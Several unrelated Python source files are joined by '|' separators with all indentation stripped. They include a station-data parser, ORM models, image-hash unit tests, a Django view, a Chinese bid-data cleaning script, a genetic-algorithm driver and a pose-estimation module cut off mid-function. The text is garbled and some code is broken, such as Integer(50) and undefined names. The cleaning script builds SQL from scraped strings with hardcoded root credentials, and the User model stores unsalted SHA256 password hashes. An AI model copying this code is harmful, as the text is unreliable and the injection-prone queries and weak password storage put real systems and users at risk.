c_AllLon = []
c_AllLat = []
c_AllHeights = []
for idx in range(nstations):
c_AllStations.append(df.loc['nombre'][idx])
c_AllLon.append(df.loc['longitud'][idx])
c_AllLat.append(df.loc['latitud'][idx])
c_AllHeights.append(df.loc['altura'][idx])
c_Index = df.index # dates in string format
c_IndexNew = [str(x) for x in c_Index]
idx = -1
while idx < 0:
for iaux in range(len(c_IndexNew)):
if c_IndexNew[iaux] == 'inicio_automatica':
idx = iaux + 1
# iaux
logging.info('Indice Primera Fecha %s', idx)
logging.info('iaux %s', iaux)
logging.info('%s', c_IndexNew[idx])
c_AllDates = c_IndexNew[idx:]
d_AllDates = [datetime.strptime(c_Date, "%Y-%m-%d") for c_Date in c_AllDates]
# DEFINING INITIAL AND FINAL DATE
f_YearIni = dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y').year
f_YearFin = dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y').year
f_MonthIni = dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y').month
f_MonthFin = dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y').month
d_IniDate = dt.datetime(f_YearIni, f_MonthIni, 01)
i_LastDayinMonth = monthrange(f_YearFin, f_MonthFin)[1]
d_FinDate = dt.datetime(f_YearFin, f_MonthFin, i_LastDayinMonth)
idx_IniDate = bisect.bisect_right(d_AllDates, d_IniDate) - 1
idx_FinDate = bisect.bisect_left(d_AllDates, d_FinDate) + 1
# CREATING STRUCTURE
idef = 0
# for istn in range(nstations):
for istn in range(10):
# Creating structure for each station
t_StationData_Aux = dict()
logging.info('Station : %s', c_AllStations[istn])
t_StationData_Aux['c_StationName'] = c_AllStations[istn]
t_StationData_Aux['c_Date'] = c_AllDates[idx_IniDate:idx_FinDate]
t_StationData_Aux['f_Time'] = np.array(date2num(d_AllDates[idx_IniDate:idx_FinDate])) # +0.5
t_StationData_Aux['d_Time'] = d_AllDates[idx_IniDate:idx_FinDate]
t_StationData_Aux['f_Lon'] = float(c_AllLon[istn])
t_StationData_Aux['f_Lat'] = float(c_AllLat[istn])
t_StationData_Aux['f_Elevation'] = float(c_AllHeights[istn])
f_Toto = np.array(f_Data[idx_IniDate:idx_FinDate, istn]).astype(np.float)
f_Toto[f_Toto == -9999.0] = np.nan
t_StationData_Aux[c_Variables] = f_Toto
if idef == 0:
t_StationData = t_StationData_Aux
idef = 1
else:
for c_str in t_StationData.keys():
if (idef == 1):
Aux1 = [t_StationData[c_str]]
else:
Aux1 = t_StationData[c_str]
Aux1.append(t_StationData_Aux[c_str])
t_StationData[c_str] = Aux1
# pdb.set_trace()
idef = 2
t_StationData['t_Units'] = dict()
if c_Variables in t_VarsUnits:
t_StationData['t_Units'][c_Variables] = t_VarsUnits[c_Variables]
else:
t_StationData['t_Units'][c_Variables] = None
return t_StationData, c_TimeFrec
|
from sqlalchemy import Column, Integer, String, SmallInteger
from app.models.base import base
class Drift(base):
# 接受者的信息
recipitent_name = Column(String(20), nullable=False)
address = Column(String(120), nullable=False)
message = Column(String(50))
mobile = Column(String(11), nullable=False)
# 书籍的信息
isbn = Column(String(25), nullable=False)
book_title = Column(String(100), nullable=False)
book_author = Column(String(15), nullable=False)
book_img = Column(String(255), nullable=False)
# 请求者的信息
requester_id = Column(Integer(50),nullable=False)
requester_nickname = Column(String(20), nullable=False)
# 赠送者的信息
gifter_id = Column(Integer(50), nullable=False)
gift_id = Column(Integer(50), nullable=False)
gifter_nickname = Column(String(20), nullable=False)
pending = Column('pending', SmallInteger, default=1)
|
#!/usr/bin/env python3
import grapher
import grapher_pb2 as pb
import hashlib
import unittest
class TestGrapherServicer(unittest.TestCase):
def test_get_line_graph(self):
totals_time = []
metadatas = []
metadatas.append(pb.Metadata(
title = "IPv4 title",
x_axis = 12,
y_axis = 10,
colour = "#238341",
)
)
metadatas.append(pb.Metadata(
title = "IPv6 title",
x_axis = 12,
y_axis = 10,
colour = "#0041A0",
)
)
totals_time.append(pb.TotalTime(
v4_values = 10,
v6_values = 20,
time = 1560640600,
)
)
totals_time.append(pb.TotalTime(
v4_values = 30,
v6_values = 40,
time = 1560740799,
)
)
totals_time.append(pb.TotalTime(
v4_values = 25,
v6_values = 35,
time = 1560840998,
)
)
request = pb.LineGraphRequest(
metadatas = metadatas,
totals_time = totals_time,
copyright = "some copyright",
)
results = grapher.get_line_graph(request).images
hashes = [
"b2c242eb9d89dc5499ff2bbd28743cf3f335ba6100300da4b3d4237e8c685f2f",
"9a0a6c6c9a9c7b647bae8a687c4afe17c941e0bc18953e8ba8a85334fcf877f8",
]
for i in range(len(results)):
# Uncomment the below when making changes to save the image to view.
#image = ("{}.png".format(results[i].title))
#print("hash of file is {}".format(hashlib.sha256(results[i].image).hexdigest()))
#with open(image, "wb") as f:
# f.write(results[i].image)
self.assertEqual(
hashlib.sha256(results[i].image).hexdigest(),
hashes[i],
)
def test_get_pie_chart(self):
metadatas = []
metadatas.append(pb.Metadata(
title = "IPv4 title",
x_axis = 12,
y_axis = 10,
colours = ["lightgreen", "gold"],
labels = ["/8", "/24"],
)
)
metadatas.append(pb.Metadata(
title = "IPv6 title",
x_axis = 12,
y_axis = 10,
colours = ["lightgreen", "gold"],
labels = ["/8", "/24"],
)
)
subnet_family = pb.SubnetFamily(
v4_values = (300, 600),
v6_values = (30, 100),
)
request = pb.PieChartRequest(
metadatas = metadatas,
subnets = subnet_family,
copyright = "some copyright",
)
results = grapher.get_pie_chart(request).images
hashes = [
"eff79e5c555edfebce3be57e0cf70ebda366dadb8d435063f89ff5e5461aa636",
"7d724137b605f36abe1d44ac088db2dccd182eb205896b3e9177d581e047ca0b",
]
for i in range(len(results)):
#Uncomment the below when making changes to save the image to view.
#image = ("{}.png".format(results[i].title))
#print("hash of file is {}".format(hashlib.sha256(results[i].image).hexdigest()))
#with open(image, "wb") as f:
# f.write(results[i].image)
self.assertEqual(
hashlib.sha256(results[i].image).hexdigest(),
hashes[i],
)
def test_get_rpki(self):
rpkis = []
metadatas = []
metadatas.append(pb.Metadata(
title = "IPv4 title",
x_axis = 12,
y_axis = 10,
)
)
metadatas.append(pb.Metadata(
title = "IPv6 title",
x_axis = 12,
y_axis = 10,
)
)
rpki = pb.RPKI(
v4_valid = 100,
v4_invalid = 100,
v4_unknown = 100,
v6_valid = 100,
v6_invalid = 100,
v6_unknown = 100,
)
request = pb.RPKIRequest(
metadatas = metadatas,
rpkis = rpki,
copyright = "some copyright",
)
results = grapher.get_rpki(request).images
hashes = [
"e258018ac4eca9257405419ee9d8a85a707534857f47394b00fd092b8657be66",
"d1a15e5116ec95af275b6cface9aceeb5db818916250295ea85e6c5c912e86ac",
]
for i in range(len(results)):
#Uncomment the below when making changes to save the image to view.
#image = ("{}.png".format(results[i].title))
#print("hash of file is {}".format(hashlib.sha256(results[i].image).hexdigest()))
#with open(image, "wb") as f:
# f.write(results[i].image)
self.assertEqual(
hashlib.sha256(results[i].image).hexdigest(),
hashes[i],
)
if __name__ == '__main__':
unittest.main() |
from sqlalchemy import Column, Integer, String, Boolean
from database import Base
from Crypto.Hash import SHA256
NAME_MAX = 50
USER_MAX = 120
EMAIL_MAX = 120
PASSWORD_MAX = SHA256.digest_size
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
name = Column(String(NAME_MAX))
user = Column(String(USER_MAX), unique=True)
email = Column(String(EMAIL_MAX), unique=True)
password = Column(String(PASSWORD_MAX))
is_admin = Column(Boolean, unique=False, default=False)
def __init__(self, name=None, email=None, username=None, password=None, is_admin=False):
self.name = name
self.user = username
self.email = email
self.password = SHA256.new(data=password.encode('utf-8')).hexdigest()
self.is_admin = is_admin
def __repr__(self):
user_str = ''
if self.is_admin == True:
user_str += '[admin] '
user_str += '<User \"{}\" - {} ({}) : {}>'.format(self.name, self.user, self.email, self.password)
return user_str
|
from django.urls import reverse_lazy
from django.contrib.messages import success
from django.shortcuts import redirect
from django.views.generic.edit import (
CreateView,
)
from .models import Contact
from .forms import ContactForm
from django.contrib.messages import success
from django.shortcuts import redirect
class ContactCreateView(CreateView):
model = Contact
form_class = ContactForm
template_name = "contact.html"
success_url = reverse_lazy('index:home')
def form_valid(self, form):
success(self.request, 'Mesajınız qeydə alınmışdır tez bir zamanda sizinlə əlaqə saxlanılılacaq.')
return super().form_valid(form) |
# -*- coding: utf-8 -*-
# ! /usr/bin/env python
"""
@author:LiWei
@license:LiWei
@contact:877129310@qq.com
@version:V1.0
@var:中标信息清洗
@note:中标信息清洗及入库等
"""
import re
import MySQLdb
from xbzxproject.utils import loadconfig
import datetime
import logging
# 中标公司信息清洗
def zbxx(database, tablename, days):
conn = MySQLdb.connect(host="192.168.10.24", port=3306, user="root", passwd="root", charset="utf8")
cur = conn.cursor()
now = datetime.datetime.now()
day = now - datetime.timedelta(days=days)
day = day.strftime(u"%Y-%m-%d 00:00:00")
cur.execute(u"SELECT content,url FROM {}.{} WHERE insert_time >='{}';".format(database, tablename, day))
contents = cur.fetchall()
for c in contents:
cc = c[0]
r = re.findall(u'(?<=中标单位:).*?公司', cc)
r1 = re.findall(u'(?<=中标候选人:).*?公司', cc)
j = re.findall(u'(?<=中标价格:).*?\d+[.|\d]+\d+', cc)
j1 = re.findall(u'(?<=中标金额:).*?元', cc)
j2 = re.findall(u'(?<=成交金额).*?元', cc)
j3 = re.findall(u'(?<=成交金额:).*?整', cc)
if len(r) > 0:
print r[0], c[1]
cur.execute(u"UPDATE {}.{} SET qyname='{}' WHERE url = '{}'".format(database, tablename, r[0], c[1]))
elif len(r1) > 0:
print r1[0], c[1]
cur.execute(u"UPDATE {}.{} SET qyname='{}' WHERE url = '{}'".format(database, tablename, r1[0], c[1]))
elif len(j) > 0:
print j[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j[0], c[1]))
elif len(j1) > 0:
print j1[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j1[0], c[1]))
elif len(j2) > 0:
print j2[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j2[0], c[1]))
elif len(j3) > 0:
print j3[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j3[0], c[1]))
conn.commit()
cur.close()
conn.close()
u"""数据清洗添加主题识别码
tablename参数:待清洗表
days : 清洗天数(从当前天数开始算起)
"""
def qxdata(tablename1, tablename2, days):
words = loadconfig.loadname()
conn = MySQLdb.connect(host="192.168.10.24", port=3306, user="root", passwd="root", charset="utf8")
cur = conn.cursor()
cout = 1
u"""清空临时表
"""
logging.warning(u"清空临时表:%s中..." % tablename1)
cur.execute(u"TRUNCATE temp.{};".format(tablename1))
logging.warning(u"清空临时表:%s中..." % tablename2)
cur.execute(u"TRUNCATE temp.{};".format(tablename2))
u"""插入待清洗数据
"""
now = datetime.datetime.now()
day = now - datetime.timedelta(days=days)
day = day.strftime(u"%Y-%m-%d 00:00:00")
logging.warning(u"插入待清洗数据表:%s..." % tablename1)
cur.execute(
u"INSERT INTO temp.{} SELECT * FROM yqapp.{} WHERE insert_time >= '{}' ;".format(tablename1, tablename1, day))
logging.warning(u"插入待清洗数据表:%s..." % tablename2)
cur.execute(
u"INSERT INTO temp.{} SELECT * FROM yqapp.{} WHERE insert_time >= '{}' ;".format(tablename2, tablename2, day))
u"""清洗主体识别码
"""
for w in words:
logging.warning(u"已执行第%s条" % cout)
ztsbm = w[1]
word = w[0]
cur.execute(u"UPDATE temp.{} SET ztsbm='{}' WHERE qyname LIKE '%{}%'".format(tablename1, ztsbm, word))
# 企业新闻清洗
cur.execute(
u"UPDATE temp.{} SET ztsbm='{}',qyname='{}' WHERE content LIKE '%{}%'".format(tablename2, ztsbm, word,
word))
# cur.execute(u"UPDATE yqapp.zhaopin SET ztsbm={} WHERE name LIKE '%{}%'".format(ztsbm,word))
conn.commit()
cout += 1
logging.warning(u'删除没有主体识别码数据中...')
cur.execute(u"DELETE FROM temp.{} WHERE ISNULL(ztsbm)".format(tablename1))
cur.execute(u"DELETE FROM temp.{} WHERE ISNULL(ztsbm)".format(tablename2))
conn.commit()
logging.warning(u"将清洗完的完整数据插入到清洗表:{}_qx、{}_qx 中".format(tablename1,tablename2))
cur.execute(
u"INSERT INTO temp.{}_qx SELECT * FROM temp.{};".format(tablename1, tablename1))
cur.execute(
u"INSERT INTO temp.{}_qx SELECT * FROM temp.{};".format(tablename2, tablename2))
conn.commit()
cur.close()
conn.close()
if __name__ == '__main__':
# 参数为表明
#2017-4-28
logging.warning(u"中标公司信息清洗...")
zbxx(database='yqapp', tablename='zbxx', days=21)
qxdata(tablename1='zbxx', tablename2='news', days=21)
|
from datetime import datetime
import threading
def run_time_decorator(main_function):
"""
this decorator will calculate the run time of the function
"""
def wrapper(*args):
start_time = datetime.now()
response = main_function(*args)
end_time = datetime.now()
print "{} {}: '{}' function took {} secs to execute".format(str(datetime.now()).split('.')[0], threading.currentThread().getName(), main_function.__name__, str((end_time-start_time).total_seconds()))
return response
return wrapper
|
#!/usr/bin/env python3
import sys
sys.path.insert(0, '..')
import models.model as model
import gaModel.parallelGA as parallelGA
import numpy as np
# from mpi4py import MPI
def execParallelGA(year, region, qntYears=5, times=1):
"""
Creates the GAModel with SC catalog with parallel and
distributed island model
"""
observations = list()
means = list()
for i in range(qntYears):
observation = model.loadModelDB(region + 'jmaData', year + i)
observation.bins = observation.bins.tolist()
observations.append(observation)
means.append(observation.bins)
mean = np.mean(means, axis=0)
for i in range(times):
model_ = model.model()
model_ = parallelGA.gaModel(
NGEN=100,
CXPB=0.9,
MUTPB=0.1,
modelOmega=observations,
year=year +
qntYears,
region=region,
mean=mean,
FREQ=10,
tournsize=2,
n_aval=50000)
model_.executionNumber = i
model_.year = year + qntYears
model_.modelName = region + 'parallelGA'
# parallelGA_ = model.loadModelDB(region + 'parallelGA', year)
# if (parallelGA_.definitions==None):
# model.saveModelDB(model_)
def callParallelGA(region):
"""
It is a wrapper to the function that generates the parallel GAModel
It cover the years of 2000 to 2005, and the models are from 2005 to 2010
"""
year = 2000
# while(year <= 2005):
execParallelGA(year, region)
year += 1
def main():
"""
This function creates the needed enviroment needed to generate both
in parallel and distrituded,
GAModel and List Model with SC catalog
for the regions: EastJapan, Kanto, Kansai, Tohoku
from 2000 to 2005 to create models from 2005 to 2010
"""
region = 'Kanto'
callParallelGA(region)
# region = 'EastJapan'
# callParallelGA(region)
# region = 'Tohoku'
# callParallelGA(region)
# region = 'Kansai'
# callParallelGA(region)
if __name__ == "__main__":
main()
|
import autograd.numpy as np
import matplotlib.pyplot as plt
import cv2 as cv2
import utils
import os
import time
import sys
from util_classes import Store, Output, Model, Template
from pymanopt.manifolds import Stiefel
from pymanopt import Problem
from pymanopt.solvers import TrustRegions
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
def readHM(filepath, M):
'''
read the output of the neural network and return the heatmaps
we use plt to read the image because it is simpler than cv2
:param filepath : path to the file
:param M : number of keypoints
: : 3D array[64,64,M] with the raw keypoints
'''
HM = np.zeros([64,64,M])
for i in range(M):
hm_name = filepath[0:len(filepath)-4] + '_{:02d}'.format(i+1) + filepath[len(filepath)-4:len(filepath)]
#print(hm_name)
HM[:,:,i] = cv2.imread(hm_name)[:,:,0]
return HM/255.0
def cropImage(image,center,scale):
'''
crop the image and rezise it as an 200 by 200 image
:param image : the image you want to resize
:param center : the center of the image form which you want to resize the image
:param scale : the cropping scale
:return : the cropped and resized image
'''
w = int(200*scale)
h = int(w)
x = int(center[0] - w/2)
y = int(center[1] - h/2)
im = cv2.copyMakeBorder( image, w, w, h, h, cv2.BORDER_CONSTANT)
im1 = im[w:x+2*w,h:y+2*h]
im1 = cv2.resize(im1, (200, 200), interpolation=cv2.INTER_CUBIC)
return im1
def findWMax(hm):
'''
read the heatmap and return the coordinates of the values of the maximum of the heatmap
:param hm : the heatmap given by readHM
:return : [W_max, score] where W_max is a array containing the coordinates of the maximum and score is the value of the maximum
'''
p = hm.shape[2]
W_max = np.zeros([2,p])
score = np.zeros(p)
for i in range(p):
score[i] = np.amax(hm[:,:,i])
(x,y) = np.where(hm[:,:,i]==score[i])
W_max[0,i] = y[0] + 1
W_max[1,i] = x[0] + 1 # +1 to compare with matlab
return [W_max, score]
def prox_2norm(Z,lam):
'''
This function simplifies Z based on the value of lam and the svd of Z
:param Z : matrix that need to be simplified
:param lam : cutting parameter
:return : [X, normX] this simplified matrix and the its first singular value
'''
[U,w,V] = np.linalg.svd(Z) # Z = U*W*V
if np.sum(w) <= lam:
w = [0,0]
elif w[0] - w[1] <=lam:
w[0] = (np.sum(w) - lam) / 2
w[1] = w[0]
else:
w[0] = w[0] - lam
w[1] = w[1]
W = np.zeros(Z.shape)
W[:len(Z[0]),:len(Z[0])] = np.diag(w)
X = np.dot(U,np.dot(W,V)) # X = U*W*V
normX = w[0]
return [X, normX]
def proj_deformable_approx(X):
'''
Ref: A. Del Bue, J. Xavier, L. Agapito, and M. Paladini, "Bilinear
Factorization via Augmented Lagrange Multipliers (BALM)" ECCV 2010.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; version 2, June 1991
USAGE: Y = proj_deformable_approx(X)
This function projects a generic matrix X of size 3*K x 2 where K is the
number of basis shapes into the matrix Y that satisfy the manifold
constraints. This projection is an approximation of the projector
introduced in: M. Paladini, A. Del Bue, S. M. s, M. Dodig, J. Xavier, and
L. Agapito, "Factorization for Non-Rigid and Articulated Structure using
Metric Projections" CVPR 2009. Check the BALM paper, Sec 5.1.
:param X : the 3*K x 2 affine matrix
:return : the 3*K x 2 with manifold constraints
'''
r = X.shape[0]
d = int(r / 3)
A = np.zeros((3,3))
for i in range(d):
Ai = X[3*i:3*(i+1),:]
A = A + np.dot(Ai,np.transpose(Ai))
[U, S, V] = np.linalg.svd(A,4)
Q = U[:,0:2]
G = np.zeros((2,2))
for i in range(d):
Ai = X[3*i:3*(i+1),:]
Ti = np.dot(np.transpose(Q),Ai)
gi = np.array([ np.trace(Ti) , Ti[1,0] - Ti[0,1] ])
G = G + np.outer(gi,np.transpose(gi)) # it is really import to use outer and not dot !!! test yourself
[U1, S1, V1] = np.linalg.svd(G)
G = np.zeros((2,2))
for i in range(d):
Ai = X[3*i:3*(i+1),:]
Ti = np.dot(np.transpose(Q),Ai)
gi = np.array([ Ti[0,0]-Ti[1,1] , Ti[0,1]+Ti[1,0] ])
G = G + np.outer(gi, np.transpose(gi))
[U2, S2, V2] = np.linalg.svd(G,4)
if S1[0] > S2[0]:
u = U1[:,0]
R = [[u[0], -u[1]],[u[1], u[0]]]
else:
u = U2[:,0]
R = [[u[0], u[1]], [u[1], -u[0]]]
Q = np.dot(Q,R)
Y = np.zeros([d*Q.shape[0],Q.shape[1]])
L = np.zeros(d)
for i in range(d):
Ai = X[3*i:3*(i+1),:]
ti = 0.5*np.trace(np.dot(np.transpose(Q),Ai))
L[i] = ti
Y[:,2*i:2*(i+1)] = ti*Q
return [Y, L, Q]
def syncRot(T):
'''
returns the rotation matrix of the approximation of the projector created by proj_deformable_approx
:param T : the motion matrix calculated in PoseFromKpts_WP
:return : [R,C] the rotation matrix and the values of a sorte of norm that is do not really understand
'''
[_, L, Q] = proj_deformable_approx(np.transpose(T))
s = np.sign(L[np.argmax(np.abs(L))])
C = s*np.transpose(L)
R = np.zeros((3,3))
R[0:2,0:3] = s*np.transpose(Q)
R[2,0:3] = np.cross(Q[0:3,0],Q[0:3,1])
return [R,C]
def estimateR_weighted(S,W,D,R0):
'''
estimates the update of the rotation matrix for the second part of the iterations
:param S : do know
:param W : heatmap
:param D : weight of the heatmap
:param R0 : rotation matrix
:return: R the new rotation matrix
'''
A = np.transpose(S)
B = np.transpose(W)
X0 = R0[0:2,:]
[m,n] = A.shape
p = B.shape[1]
At = np.zeros([n, m]);
At = np.transpose(A)
# we use the optimization on a Stiefel manifold because R is constrained to be othogonal
manifold = Stiefel(n,p,1)
# creation of the store object, for now it is not usefull be may contribute the the improvement of the code
store = Store()
####################################################################################################################
def cost(X):
'''
cost function of the manifold, the cost is trace(E'*D*E)/(2*N) with E = A*X - B or store.E
:param X : vector
:param store: a Store oject to store some information
:return : [f,score] f is the score, store is the Store object
'''
if store.E is None:
store.E = np.dot(A,np.transpose(X))-B
E = store.E
f = np.trace(np.dot(np.transpose(E),np.dot(D,E)))/2
return f
def grad(X):
'''
grad function of the manifold, the gradient is the reimannian gradient computed with the manifold
:param X : vector
:param store : a Store oject to store some information
:return : [g,store] g is the gradient and store is the Store object
'''
if store.E is None:
_ = cost(X)
E = store.E
# compute the euclidean gradient of the cost with the rotations R and the cloud A
egrad = np.dot(At,np.dot(D,E))
# transform this euclidean gradient into the Riemmanian gradient
g = manifold.egrad2rgrad(np.transpose(X),egrad)
store.egrad = egrad
return np.array(g)
####################################################################################################################
# setup the problem structure with manifold M and cost and grad function
problem = Problem(manifold=manifold, cost=cost, verbosity=0)
# setup the trust region algorithm to solve the problem
TR = TrustRegions(maxiter=10)
# solve the problem
X = TR.solve(problem,X0)
return np.transpose(X) # return R = X'
def estimateC_weighted(W, R, B, D, lam):
'''
:param W : the heatmap
:param R : the rotation matrix
:param B : the base matrix
:param D : the weight
:param lam : lam value used to simplify some results
:return : C0
'''
p = len(W[0])
k = int(B.shape[0]/3)
d = np.diag(D)
D = np.zeros((2*p,2*p))
eps = sys.float_info.epsilon
for i in range(p):
D[2*i, 2*i] = d[i];
D[2*i+1, 2*i+1] = d[i];
# next we work on the linear system y = X*C
y = W.flatten() # vectorized W
X = np.zeros((2*p,k)) # each colomn is a rotated Bk
for i in range(k):
RBi = np.dot(R,B[3*i:3*(i+1),:])
X[:,i] = RBi.flatten()
# we want to calculate C = pinv(X'*D*X+lam*eye(size(X,2)))*X'*D*y and then C = C'
A = np.dot(np.dot(np.transpose(X),D),X) + lam*np.eye(X.shape[1])
tol = max(A.shape) * np.linalg.norm(A,np.inf) * eps
C = np.dot(np.dot(np.linalg.pinv(A),np.dot(np.transpose(X),D)),y)
return np.transpose(C)
def PoseFromKpts_WP(W, dict, weight=None, verb=True, lam=1, tol=1e-10):
'''
compute the pose with weak perspective
:param W: the maximal responses in the headmap
:param dict: the cad model
:param varargin: other variables
:return ; return a Output object containing many informations
'''
# data size
B = np.copy(dict.mu) # B is the base
pc = np.copy(dict.pc)
[k,p] = B.shape
k = int(k/3)
# setting values
if weight is None:
D = np.eye(p)
else:
D = np.diag(weight)
alpha = 1
# centralize basis
mean = np.mean(B, 1)
for i in range(3*k):
B[i] -= mean[i]
# initialization
M = np.zeros([2, 3 * k]);
C = np.zeros(k); # norm of each Xi
# auxiliary variable for ADMM
Z = np.copy(M)
Y = np.copy(M)
eps = sys.float_info.epsilon
mu = 1/(np.mean(W)+eps)
# pre-computing
BBt = np.dot(B,np.dot(D,np.transpose(B)))
# iteration
for iter in range(1000):
# update translation
T = np.sum(np.dot((W-np.matmul(Z,B)),D), 1) / (np.sum(D)+eps) # T = sum((W-Z*B)*D, 1) / (sum(D)+eps)
W2fit = np.copy(W)
W2fit[0] -= T[0]
W2fit[1] -= T[1]
# update motion matrix Z
Z0 = np.copy(Z)
Z = np.dot( np.dot(W2fit,np.dot(D,np.transpose(B))) + mu*M + Y , np.linalg.inv(BBt+mu*np.eye(3*k))) # Z = (W2fit*D*B'+mu*M+Y)/(BBt+mu*eye(3*k))
# update motion matrix M
Q = Z - Y/mu
for i in range(k):
[X, normX] = prox_2norm(np.transpose(Q[:,3*i:3*i+3]),alpha/mu)
M[:, 3*i:3*i+3] = np.transpose(X)
C[i] = normX
# update dual variable
Y = Y + mu*(M-Z)
PrimRes = np.linalg.norm(M-Z) / (np.linalg.norm(Z0)+eps)
DualRes = mu*np.linalg.norm(Z - Z0) / (np.linalg.norm(Z0)+eps)
# show output
if verb:
print('Iter = ', iter, ' ; PrimRes = ',PrimRes, '; DualRes = ', DualRes,' ; mu = ', '{:08.6f}'.format(mu), '\n')
# check convergente
if PrimRes < tol and DualRes < tol:
break
else:
if PrimRes > 10 * DualRes:
mu = 2 * mu;
elif DualRes > 10 * PrimRes:
mu = mu / 2;
else:
pass
# end iteration
[R, C] = syncRot(M)
if np.sum(np.abs(R)) == 0:
R = np.eye(3)
R = R[0:2,:]
S = np.dot(np.kron(C,np.eye(3)),B)
# iteration, part 2
fval = np.inf
for iter in range(1000):
T = np.sum(np.dot((W-np.dot(R,S)),D), 1) / (np.sum(D)+eps) # T = sum((W-R*S)*D, 1) / (sum(D)+eps)
W2fit = np.copy(W)
W2fit[0] -= T[0]
W2fit[1] -= T[1]
# update rotation
R = np.transpose(estimateR_weighted(S, W2fit, D, R))
# update shape
if len(pc) == 0:
C0 = estimateC_weighted(W2fit, R, B, D, 1e-3)[0]
S = C0*B
else:
W_1 = W2fit - np.dot(np.dot(R , np.kron(C, eye(3))) , pc)
C0 = estimateC_weighted(W_1, R, B, D, 1e-3)
W_2 = W2fit - np.dot(np.dot(R , C0) , B)
C = estimateC_weighted(W_2, R, pc, D, lam)
S = np.dot(C0,B) + np.dot(np.kron(C,np.eye(3)),pc)
fvaltml = fval
# fval = 0.5*norm((W2fit-R*S)*sqrt(D),'fro')^2 + 0.5*norm(C)^2;
fval = 0.5*np.linalg.norm(np.dot(W2fit-np.dot(R,S),np.sqrt(D)),'fro')**2 + 0.5*np.linalg.norm(C)**2
# show output
if verb:
print('Iter = ', iter, 'fval = ', fval)
# check convergence
if np.abs(fval-fvaltml) / (fvaltml+eps) < tol:
break
# end iteration
R2 = np.zeros((3,3))
R2[0,:] = R[0,:]
R2[1, :] = R[1, :]
R2[2,:] = np.cross(R[0,:],R[1, :])
output = Output(S=S, M=M, R=R2, C=C ,C0=C0, T=T, fval=fval)
return output
def PoseFromKpts_FP(W, dict, R0=None, weight=None, verb=True, lam=1, tol=1e-10):
'''
compute the pose with full perspective
solve in ||W*diag(Z)-R*S-T||^2 + ||C||^2 with S = C1*B1+...+Cn*Bn, Z denotes the depth of points
:param W: the maximal responses in the headmap
:param dict: the cad model
:param varargin: other variables
:return ; return a Output object containing many informations
'''
# data size
mu = np.copy(dict.mu) # B is the base
pc = np.copy(dict.pc)
R = np.copy(R0)
# setting values
if weight is None:
D = np.eye(p)
else:
D = np.diag(weight)
# centralize basis
meanmu = np.mean(mu, 1)
for i in range(mu.shape[0]):
mu[i] -= meanmu[i]
# initialization
eps = sys.float_info.epsilon
S = mu
T = np.mean(W,1) * np.mean(np.std(np.dot(R[0:2,:],S),1)) / (np.mean(np.std(W,1))+eps)
C = 0
fval = np.inf
# iteration
for iter in range(1000):
# update the depth of Z
Z = np.dot(R,S)
for j in range(3):
Z[j] += T[j]
Z = np.sum(W * Z,0) / (np.sum(W**2, 0)+eps)
# update R and T by aligning S to W*diag(Z)
Sp = np.dot(W, np.diag(Z))
T = np.sum(np.dot(Sp-np.dot(R,S),D), 1) / (np.sum(np.diag(D))+eps)
St = Sp
for j in range(Sp.shape[0]):
St[j] -= T[j]
[U, _, V] = np.linalg.svd(np.dot(St,np.dot(D,np.transpose(S))))
R = np.dot(np.dot(U,np.diag([1 , 1 , np.linalg.det(np.dot(U,V))])),V)
fvaltml = fval
fval = np.linalg.norm(np.dot(St-np.dot(R,S),np.sqrt(D)), 'fro')**2 + lam*np.linalg.norm(C)**2
# show output
if verb:
print('Iter = ',iter, 'fval = ',fval)
# check convergence
if np.abs(fval-fvaltml) / (fvaltml+eps) < tol:
break
output = Output(S=S, R=R, C=C, T=T, Z=Z, fval=fval)
return output
def findRotation(S1,S2):
'''
find the rotation matrix between S1 and S2
:param S1 : matrix 1
:param S2 : matrix 2
:return : R, the rotation R*S1 = S2
'''
[f,p] = S1.shape
f = int(f/3)
S1 = np.reshape(S1,(3,f*p))
S2 = np.reshape(S2,(3,f*p))
R = np.dot(S1,np.transpose(S2))
# /!\ the matlab svd computes R = USV' and the python svd computes R = USV
[U, _, V] = np.linalg.svd(R)
R = np.dot(U,V)
R = np.dot(U, np.dot(np.diag([1.0,1.0,np.linalg.det(R)]), V))
return R
def fullShape(S1,model):
'''
creates the new model besed on the S
:param S1 : the matrix S (I do not know what it is exactly
:param model : an object of the class Model
:return : the new object Model, and some other information and transformation matrix
'''
eps = sys.float_info.epsilon
# normalization of S
S2 = np.copy(np.transpose(model.kp))
T1 = np.mean(S1,1)
T2 = np.mean(S2,1)
for i in range(len(T1)):
S1[i] -= T1[i]
S2[i] -= T2[i]
R = findRotation(S1,S2)
S2 = np.dot(R,S2)
w = np.trace(np.dot(np.transpose(S1), S2))/(np.trace(np.dot(np.transpose(S2), S2))+eps);
T = T1 - w*np.dot(R,T2)
vertices = np.transpose(model.vertices)
for i in range(len(T)):
vertices[i] = vertices[i] - T2[i]
vertices = w*np.dot(R,vertices)
for i in range(len(T)):
vertices[i] = vertices[i] + T1[i]
model_new = model.copy()
model_new.vertices = np.transpose(vertices)
model_new.nb_vertices = len(vertices)
return [model_new,w,R,T]
def get_transform(center,scale,res):
'''
no idea what this think does
:param center:
:param scale:
:param res:
:return:
'''
h = 200*scale
t = np.eye(3)
t[0, 0] = res[1] / h
t[1, 1] = res[0] / h
t[0, 2] = res[1] * (-center[0] / h + 0.5)
t[1, 2] = res[0] * (-center[0] / h + 0.5)
t[2, 2] = 1
return t
def transformHG(pt,center,scale,res,invert):
'''
no fucking idea what this think does
:param pt:
:param center:
:param scale:
:param res:
:param invert:
:return:
'''
t = get_transform(center,scale,res)
if invert:
t = np.linalg.inv(t)
new_pt = np.zeros(pt.shape)
new_pt[0] = pt[0]
new_pt[1] = pt[1] - 0.5
new_pt[2] = np.ones(new_pt[2].shape)
